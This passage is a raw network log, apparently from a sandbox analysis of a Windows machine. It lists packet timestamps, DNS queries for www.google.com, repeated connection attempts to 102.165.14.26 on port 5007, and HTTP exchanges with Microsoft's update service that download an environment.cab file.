                                                                                            Apr 29, 2024 11:36:22.814765930 CEST4434971020.12.23.50192.168.2.8
                                                                                            Apr 29, 2024 11:36:22.814841986 CEST4434971020.12.23.50192.168.2.8
                                                                                            Apr 29, 2024 11:36:22.814870119 CEST49710443192.168.2.820.12.23.50
                                                                                            Apr 29, 2024 11:36:22.814877033 CEST4434971020.12.23.50192.168.2.8
                                                                                            Apr 29, 2024 11:36:22.814944029 CEST49710443192.168.2.820.12.23.50
                                                                                            Apr 29, 2024 11:36:22.815020084 CEST4434971020.12.23.50192.168.2.8
                                                                                            Apr 29, 2024 11:36:22.815063953 CEST49710443192.168.2.820.12.23.50
                                                                                            Apr 29, 2024 11:36:22.818269014 CEST49710443192.168.2.820.12.23.50
                                                                                            Apr 29, 2024 11:36:22.818269014 CEST49710443192.168.2.820.12.23.50
                                                                                            Apr 29, 2024 11:36:22.818289995 CEST4434971020.12.23.50192.168.2.8
                                                                                            Apr 29, 2024 11:36:22.818300009 CEST4434971020.12.23.50192.168.2.8
                                                                                            Apr 29, 2024 11:36:24.351315975 CEST497095007192.168.2.8102.165.14.26
                                                                                            Apr 29, 2024 11:36:32.476262093 CEST497095007192.168.2.8102.165.14.26
                                                                                            Apr 29, 2024 11:36:36.156661987 CEST49712443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:36.156702995 CEST44349712142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:36.156856060 CEST49712443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:36.157217979 CEST49713443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:36.157263994 CEST44349713142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:36.157325029 CEST49713443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:36.157450914 CEST49714443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:36.157500982 CEST44349714142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:36.157738924 CEST49714443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:36.157954931 CEST49715443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:36.157989025 CEST44349715142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:36.158040047 CEST49715443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.478931904 CEST49720443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.478940010 CEST44349720142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.478981972 CEST49720443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.486918926 CEST49715443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.486938000 CEST44349715142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.487302065 CEST49714443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.487313986 CEST44349714142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.487711906 CEST49713443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.487726927 CEST44349713142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.487972975 CEST49712443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.487996101 CEST44349712142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.489847898 CEST49720443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.489861012 CEST44349720142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.730360031 CEST44349714142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.730732918 CEST44349712142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.730942011 CEST44349713142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.732534885 CEST44349715142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.734124899 CEST44349720142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.743957996 CEST49714443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.743967056 CEST44349714142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.744210005 CEST49712443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.744225025 CEST44349712142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.744323015 CEST49713443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.744333029 CEST44349713142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.744429111 CEST49715443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.744441986 CEST44349715142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.744568110 CEST49720443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.744575024 CEST44349720142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.745083094 CEST44349714142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.745162010 CEST49714443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.745318890 CEST44349712142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.745383024 CEST49712443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.745718002 CEST44349713142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.745774984 CEST49713443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.746157885 CEST44349720142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.746190071 CEST44349715142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.746217012 CEST49720443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.746253967 CEST49715443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.758506060 CEST49714443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.758575916 CEST44349714142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.761790991 CEST49712443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.761861086 CEST44349712142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.762780905 CEST49713443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.762944937 CEST44349713142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.765099049 CEST49715443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.765348911 CEST44349715142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.767890930 CEST49720443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.767983913 CEST44349720142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.770694017 CEST49714443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.770704031 CEST44349714142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.771462917 CEST49712443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.771483898 CEST44349712142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.771629095 CEST49713443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.771641016 CEST44349713142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.772084951 CEST49715443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.772103071 CEST44349715142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.889787912 CEST49720443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.889805079 CEST44349720142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.889820099 CEST49713443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.889826059 CEST49715443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.889826059 CEST49712443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.889828920 CEST49714443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.979042053 CEST44349714142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.979089975 CEST44349714142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.979121923 CEST44349714142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.979140043 CEST49714443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.979159117 CEST44349714142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.979197025 CEST49714443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:37.982501030 CEST44349714142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.983678102 CEST44349714142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:37.983727932 CEST49714443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:38.011163950 CEST49720443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:38.233469009 CEST44349715142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.233619928 CEST49715443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:38.233638048 CEST44349715142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.233650923 CEST44349715142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.233710051 CEST49715443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:38.265516043 CEST44349712142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.265645027 CEST44349712142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.265655994 CEST49712443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:38.265711069 CEST49712443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:38.313076973 CEST44349713142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.313153028 CEST49713443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:38.313190937 CEST44349713142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.313234091 CEST44349713142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.313275099 CEST49713443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:38.324850082 CEST49712443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:38.324892044 CEST44349712142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.347089052 CEST49715443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:38.347107887 CEST44349715142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.347527027 CEST49713443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:38.347554922 CEST44349713142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.352211952 CEST49714443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:38.352227926 CEST44349714142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.355350018 CEST49721443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:38.355374098 CEST44349721142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.355437040 CEST49721443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:38.356668949 CEST49720443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:38.357223034 CEST49721443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:38.357235909 CEST44349721142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.404122114 CEST44349720142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.480937958 CEST44349720142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.481000900 CEST44349720142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.481044054 CEST49720443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:38.481074095 CEST44349720142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.481167078 CEST44349720142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.481214046 CEST49720443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:38.482805014 CEST49720443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:38.482820988 CEST44349720142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.593843937 CEST44349721142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.595549107 CEST49721443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:38.595560074 CEST44349721142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.595895052 CEST44349721142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.596347094 CEST49721443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:38.596407890 CEST44349721142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.596514940 CEST49721443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:38.640130043 CEST44349721142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.828789949 CEST44349721142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.828835011 CEST44349721142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.828883886 CEST44349721142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.828896999 CEST49721443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:38.828916073 CEST44349721142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.828973055 CEST44349721142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.829020977 CEST49721443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:38.847544909 CEST49721443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:38.847565889 CEST44349721142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:39.412004948 CEST49724443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:39.412046909 CEST44349724142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:39.412127018 CEST49724443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:39.412395000 CEST49724443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:39.412410021 CEST44349724142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:39.646238089 CEST44349724142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:39.646502972 CEST49724443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:39.646518946 CEST44349724142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:39.646837950 CEST44349724142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:39.647208929 CEST49724443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:39.647274971 CEST44349724142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:39.687374115 CEST49724443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:42.595989943 CEST497275007192.168.2.8102.165.14.26
                                                                                            Apr 29, 2024 11:36:42.990530014 CEST49707443192.168.2.823.206.229.226
                                                                                            Apr 29, 2024 11:36:42.990556002 CEST4434970723.206.229.226192.168.2.8
                                                                                            Apr 29, 2024 11:36:42.991373062 CEST49728443192.168.2.823.206.229.226
                                                                                            Apr 29, 2024 11:36:42.991422892 CEST4434972823.206.229.226192.168.2.8
                                                                                            Apr 29, 2024 11:36:42.991512060 CEST49728443192.168.2.823.206.229.226
                                                                                            Apr 29, 2024 11:36:42.991708994 CEST49728443192.168.2.823.206.229.226
                                                                                            Apr 29, 2024 11:36:42.991803885 CEST4434972823.206.229.226192.168.2.8
                                                                                            Apr 29, 2024 11:36:42.991852999 CEST49728443192.168.2.823.206.229.226
                                                                                            Apr 29, 2024 11:36:43.780817032 CEST497275007192.168.2.8102.165.14.26
                                                                                            Apr 29, 2024 11:36:44.503359079 CEST49729443192.168.2.823.221.246.93
                                                                                            Apr 29, 2024 11:36:44.503407955 CEST4434972923.221.246.93192.168.2.8
                                                                                            Apr 29, 2024 11:36:44.503536940 CEST49729443192.168.2.823.221.246.93
                                                                                            Apr 29, 2024 11:36:44.505013943 CEST49729443192.168.2.823.221.246.93
                                                                                            Apr 29, 2024 11:36:44.505031109 CEST4434972923.221.246.93192.168.2.8
                                                                                            Apr 29, 2024 11:36:44.732948065 CEST4434972923.221.246.93192.168.2.8
                                                                                            Apr 29, 2024 11:36:44.733105898 CEST49729443192.168.2.823.221.246.93
                                                                                            Apr 29, 2024 11:36:45.890508890 CEST497275007192.168.2.8102.165.14.26
                                                                                            Apr 29, 2024 11:36:46.148545980 CEST49729443192.168.2.823.221.246.93
                                                                                            Apr 29, 2024 11:36:46.148576021 CEST4434972923.221.246.93192.168.2.8
                                                                                            Apr 29, 2024 11:36:46.149005890 CEST4434972923.221.246.93192.168.2.8
                                                                                            Apr 29, 2024 11:36:46.296649933 CEST49729443192.168.2.823.221.246.93
                                                                                            Apr 29, 2024 11:36:46.312079906 CEST49729443192.168.2.823.221.246.93
                                                                                            Apr 29, 2024 11:36:46.352122068 CEST4434972923.221.246.93192.168.2.8
                                                                                            Apr 29, 2024 11:36:46.422450066 CEST4434972923.221.246.93192.168.2.8
                                                                                            Apr 29, 2024 11:36:46.422533035 CEST4434972923.221.246.93192.168.2.8
                                                                                            Apr 29, 2024 11:36:46.422584057 CEST49729443192.168.2.823.221.246.93
                                                                                            Apr 29, 2024 11:36:46.519045115 CEST49729443192.168.2.823.221.246.93
                                                                                            Apr 29, 2024 11:36:46.519078970 CEST4434972923.221.246.93192.168.2.8
                                                                                            Apr 29, 2024 11:36:46.519092083 CEST49729443192.168.2.823.221.246.93
                                                                                            Apr 29, 2024 11:36:46.519108057 CEST4434972923.221.246.93192.168.2.8
                                                                                            Apr 29, 2024 11:36:47.012392044 CEST49730443192.168.2.823.221.246.93
                                                                                            Apr 29, 2024 11:36:47.012425900 CEST4434973023.221.246.93192.168.2.8
                                                                                            Apr 29, 2024 11:36:47.012489080 CEST49730443192.168.2.823.221.246.93
                                                                                            Apr 29, 2024 11:36:47.013129950 CEST49730443192.168.2.823.221.246.93
                                                                                            Apr 29, 2024 11:36:47.013142109 CEST4434973023.221.246.93192.168.2.8
                                                                                            Apr 29, 2024 11:36:47.237124920 CEST4434973023.221.246.93192.168.2.8
                                                                                            Apr 29, 2024 11:36:47.237194061 CEST49730443192.168.2.823.221.246.93
                                                                                            Apr 29, 2024 11:36:47.240051031 CEST49730443192.168.2.823.221.246.93
                                                                                            Apr 29, 2024 11:36:47.240068913 CEST4434973023.221.246.93192.168.2.8
                                                                                            Apr 29, 2024 11:36:47.240343094 CEST4434973023.221.246.93192.168.2.8
                                                                                            Apr 29, 2024 11:36:47.242202044 CEST49730443192.168.2.823.221.246.93
                                                                                            Apr 29, 2024 11:36:47.284125090 CEST4434973023.221.246.93192.168.2.8
                                                                                            Apr 29, 2024 11:36:47.456166983 CEST4434973023.221.246.93192.168.2.8
                                                                                            Apr 29, 2024 11:36:47.456244946 CEST4434973023.221.246.93192.168.2.8
                                                                                            Apr 29, 2024 11:36:47.456326008 CEST49730443192.168.2.823.221.246.93
                                                                                            Apr 29, 2024 11:36:47.458143950 CEST49730443192.168.2.823.221.246.93
                                                                                            Apr 29, 2024 11:36:47.458143950 CEST49730443192.168.2.823.221.246.93
                                                                                            Apr 29, 2024 11:36:47.458165884 CEST4434973023.221.246.93192.168.2.8
                                                                                            Apr 29, 2024 11:36:47.458177090 CEST4434973023.221.246.93192.168.2.8
                                                                                            Apr 29, 2024 11:36:49.683778048 CEST44349724142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:49.683845043 CEST44349724142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:49.683959961 CEST49724443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:49.986418009 CEST497275007192.168.2.8102.165.14.26
                                                                                            Apr 29, 2024 11:36:50.684766054 CEST49724443192.168.2.8142.250.191.196
                                                                                            Apr 29, 2024 11:36:50.684806108 CEST44349724142.250.191.196192.168.2.8
                                                                                            Apr 29, 2024 11:36:57.996526957 CEST497275007192.168.2.8102.165.14.26
                                                                                            Apr 29, 2024 11:37:08.150590897 CEST497315007192.168.2.8102.165.14.26
                                                                                            Apr 29, 2024 11:37:09.156079054 CEST497315007192.168.2.8102.165.14.26
                                                                                            Apr 29, 2024 11:37:11.174304962 CEST497315007192.168.2.8102.165.14.26
                                                                                            Apr 29, 2024 11:37:15.177921057 CEST497315007192.168.2.8102.165.14.26
                                                                                            Apr 29, 2024 11:37:23.188491106 CEST497315007192.168.2.8102.165.14.26
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Apr 29, 2024 11:36:13.254407883 CEST138138192.168.2.8192.168.2.255
                                                                                            Apr 29, 2024 11:36:35.524260998 CEST53529331.1.1.1192.168.2.8
                                                                                            Apr 29, 2024 11:36:36.040930033 CEST5915153192.168.2.81.1.1.1
                                                                                            Apr 29, 2024 11:36:36.041805029 CEST4925153192.168.2.81.1.1.1
                                                                                            Apr 29, 2024 11:36:36.122085094 CEST53565341.1.1.1192.168.2.8
                                                                                            Apr 29, 2024 11:36:36.151113033 CEST53591511.1.1.1192.168.2.8
                                                                                            Apr 29, 2024 11:36:36.151906967 CEST53492511.1.1.1192.168.2.8
                                                                                            Apr 29, 2024 11:36:38.457123041 CEST53627411.1.1.1192.168.2.8
                                                                                            Apr 29, 2024 11:36:56.380898952 CEST53582561.1.1.1192.168.2.8
                                                                                            Apr 29, 2024 11:37:15.956664085 CEST53646171.1.1.1192.168.2.8
                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Apr 29, 2024 11:36:36.040930033 CEST192.168.2.81.1.1.10xaa6aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                            Apr 29, 2024 11:36:36.041805029 CEST192.168.2.81.1.1.10x816cStandard query (0)www.google.com65IN (0x0001)false
                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Apr 29, 2024 11:36:36.151113033 CEST1.1.1.1192.168.2.80xaa6aNo error (0)www.google.com142.250.191.196A (IP address)IN (0x0001)false
                                                                                            Apr 29, 2024 11:36:36.151906967 CEST1.1.1.1192.168.2.80x816cNo error (0)www.google.com65IN (0x0001)false
                                                                                            • slscr.update.microsoft.com
                                                                                            • www.google.com
                                                                                            • fs.microsoft.com
                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.84970520.12.23.50443
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-04-29 09:35:39 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VT3pXKsaaw8sTtx&MD=cPzR33Sv HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Accept: */*
                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                            Host: slscr.update.microsoft.com
                                                                                            2024-04-29 09:35:40 UTC560INHTTP/1.1 200 OK
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            Content-Type: application/octet-stream
                                                                                            Expires: -1
                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                            MS-CorrelationId: 254cb838-31d8-42fa-a0e1-7ca2587cfa00
                                                                                            MS-RequestId: 6f905b16-aa35-471d-bd2b-d84cfc59f221
                                                                                            MS-CV: uZ9wB9Qfjkiobpg7.0
                                                                                            X-Microsoft-SLSClientCache: 2880
                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Date: Mon, 29 Apr 2024 09:35:39 GMT
                                                                                            Connection: close
                                                                                            Content-Length: 24490
                                                                                            2024-04-29 09:35:40 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                            Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                            2024-04-29 09:35:40 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                            Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.84971020.12.23.50443
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-04-29 09:36:22 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VT3pXKsaaw8sTtx&MD=cPzR33Sv HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Accept: */*
                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                            Host: slscr.update.microsoft.com
                                                                                            2024-04-29 09:36:22 UTC560INHTTP/1.1 200 OK
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            Content-Type: application/octet-stream
                                                                                            Expires: -1
                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                            ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                            MS-CorrelationId: 2b2c49eb-c133-4705-95ea-46352cd0c9f7
                                                                                            MS-RequestId: ed689648-3894-43c5-80e3-dbbbc772e076
                                                                                            MS-CV: iQUNn9SUAU+G/aQl.0
                                                                                            X-Microsoft-SLSClientCache: 2160
                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Date: Mon, 29 Apr 2024 09:36:22 GMT
                                                                                            Connection: close
                                                                                            Content-Length: 25457
